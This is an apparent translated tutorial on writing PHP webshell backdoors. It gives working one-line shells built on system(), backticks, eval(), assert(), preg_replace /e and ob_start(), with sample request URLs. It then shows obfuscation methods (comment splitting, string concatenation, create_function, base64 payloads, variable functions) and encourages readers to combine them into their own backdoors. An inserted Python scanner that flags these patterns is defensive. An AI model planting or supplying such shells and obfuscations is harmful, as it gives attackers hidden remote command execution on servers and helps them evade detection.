About writing PHP backdoors

0x1: Principle

1. Functions to execute system commands
proc_open, popen, exec, shell_exec, passthru, system
Only two examples are given here; the others can be looked up in the PHP manual.

system()

---------------------------
<?php
system($_GET['input']);
?>
---------------------------

http://192.168.247.133:81/shell.php?input=dir

`` (backtick operator)
Executing a command with the backtick operator is equivalent to executing it with the shell_exec() function.

<?php
echo `$_GET[input]`;
?>
-------------------------------

http://192.168.247.133:81/shell.php?input=dir

Another shorter one

--------------------
<?=@`$_GET[c]`?>
-----------------------

http://192.168.247.133:81/shell.php?c=dir

Note: This requires short_open_tag to be enabled, which is the default.

2. Functions that can execute code
The eval() function evaluates a string as PHP code. The string must be valid PHP code and must end with a semicolon.

<?php
eval($_GET['input']);
?>
----------------------------

http://192.168.247.133:81/shell.php?input=phpinfo();

 

Regular expression

The preg_replace function performs a regular-expression search and replace. Its signature is mixed preg_replace(mixed pattern, mixed replacement, mixed subject, int limit, int &count), where pattern is the regular expression to search for, replacement is the string to replace with, subject is the string to be searched and replaced, limit is the number of replacements allowed, and count is the number of successful replacements. The function returns the replaced string. When the pattern parameter uses the /e modifier, preg_replace executes the replacement parameter as PHP code.

<?php
preg_replace("//e",$_GET['input'],"qingsh4n");
?>
----------------------

http://192.168.247.133:81/shell.php?input=phpinfo();

 

assert()
In PHP, assert() is used to check whether an expression holds. However, a string argument is executed as PHP code.

<?php
assert($_GET['input']);
?>
-----------------

http://192.168.247.133:81/shell.php?input=phpinfo();

 

ob_start()

--------------------
<?php
$foobar = $_GET['input1'];
ob_start($foobar);
echo $_GET['input2'];
ob_end_flush();
?>
---------------------

http://192.168.247.133:81/shell.php?input1=system&input2=dir

Further functions of this kind remain to be explored.

 

0x2: How to obfuscate

1. Comments /**/

---------------------
<?php
assert/**/($/**/{"_GET"}['input']);
?>
----------------------

http://192.168.247.133:81/shell.php?input=phpinfo();

 

2. Concatenation operator

"." in PHP is the string concatenation operator.

<?php
$var = "a";
$var .= "ss";
$var .= "er";
$var .= "t";
$var($_GET['input']);
?>
---------------------

http://192.168.247.133:81/shell.php?input=phpinfo();

Note: In testing, this did not work for echo() and eval().

 

3. Create a function
create_function() creates an anonymous function

<?php
$foobar = $_GET['input'];
$dyn_func = create_function('$qingsh4n', "echo $foobar;");
$dyn_func('');
?>
-----------------------------------

http://192.168.247.133:81/shell.php?input=phpinfo();

 

4. Encoding functions: base64, etc.

<?php
assert(base64_decode('ZXZhbCgkX0dFVFsnaW5wdXQnXSk7'));
?>
---------------------

http://192.168.247.133:81/shell.php?input=phpinfo();

Note: Other encoding functions include gzinflate(), gzuncompress(), gzdecode(), str_rot13(), etc. See the PHP manual for how to use them.

 

5. Variable functions
PHP supports the concept of variable functions. This means that if a variable name is followed by parentheses, PHP will look for a function with the same name as the value of the variable and try to execute it.

<?php
$dyn_func = $_GET['dyn_func'];
$argument = $_GET['argument'];
$dyn_func($argument);
?>
---------------------

If register_globals=on, the code can be changed to the following form:

<?php
$input1($input2);
?>
--------------------

http://192.168.247.133:81/shell.php?input1=system&input2=dir

Note: You can also use functions such as call_user_func(), array_walk(), etc.
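
Seen from the defending side, the sinks in 0x1 and the obfuscation methods in 0x2 are the patterns a file scanner should flag. The triage scanner below is an added example, not code from the original article; the rule labels, the `scan` function and the sample string are constructed here, and the regexes are heuristics rather than a PHP parser.

```python
import base64
import re

# Request superglobal, written plainly ($_GET) or as ${"_GET"}.
SRC = r"""\$\{?\s*["']?_(?:GET|POST|REQUEST|COOKIE)\b"""
DECODERS = r"(?:base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)"
RULES = [  # (label, regex); heuristics for triage, not a PHP parser
    ("command sink fed by request data",
     rf"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*{SRC}"),
    ("backtick operator on request data", rf"`[^`]*{SRC}[^`]*`"),
    ("code sink fed by request data", rf"\b(?:eval|assert)\s*\(\s*{SRC}"),
    ("code sink fed by decoder", rf"\b(?:eval|assert)\s*\(\s*{DECODERS}\s*\("),
    ("preg_replace with /e modifier",
     r"""\bpreg_replace\s*\(\s*["'][^"']*/[a-z]*e[a-z]*["']"""),
    ("create_function", r"\bcreate_function\s*\("),
    ("variable function call", r"\$\w+\s*\("),
]
B64_LITERAL = r"""base64_decode\s*\(\s*["']([A-Za-z0-9+/=]+)["']"""


def scan(php_source, depth=0):
    """Return the set of rule labels that match the given PHP source."""
    # Remove /* */ comments first so assert/**/( reads as assert(
    code = re.sub(r"/\*.*?\*/", "", php_source, flags=re.S)
    hits = {label for label, rx in RULES if re.search(rx, code, re.I)}
    # Minimal taint tracking: variables assigned directly from request data.
    for var in set(re.findall(rf"(\$\w+)\s*=\s*{SRC}", code)):
        v = re.escape(var)
        if re.search(rf"{v}\s*\(", code):
            hits.add("request-controlled function name")
        if re.search(rf"\b(?:ob_start|call_user_func|array_walk)\s*\([^)]*{v}\b", code):
            hits.add("request-controlled callback")
    # Decode base64 string literals and rescan the plaintext (bounded depth).
    for blob in (re.findall(B64_LITERAL, code) if depth < 3 else []):
        try:
            inner = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # not valid base64
            continue
        hits |= {f"{h} [in base64 literal]" for h in scan(inner, depth + 1)}
    return hits


if __name__ == "__main__":
    # Constructed sample: the ob_start() listing from this page.
    sample = "<?php $foobar = $_GET['input1']; ob_start($foobar); echo $_GET['input2']; ob_end_flush(); ?>"
    for label in sorted(scan(sample)):
        print(label)
```

The "variable function call" rule also matches legitimate callback code, so treat it as a pointer for manual review rather than a verdict.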

0x3: Write your own webshell

With the knowledge above, you can freely combine the code execution and obfuscation techniques to write your own PHP backdoor. Finally, I attach 6 ways to write hello world; maybe you will find some inspiration here.

 

0x4: References
http://www.php.net/
http://www.php-security.org/2010/05/20/mops-submission-07-our-dynamic-php/index.html#sec22
http://www.t00ls.net/viewthread.php?tid=18951
http://hi.baidu.com/monyer/item/a218dbadf2afc7a828ce9d63
http://h.ackack.net/tiny-php-shell.html
http://www.rising.com.cn/newsletter/news/2012-06-27/11810.html

 
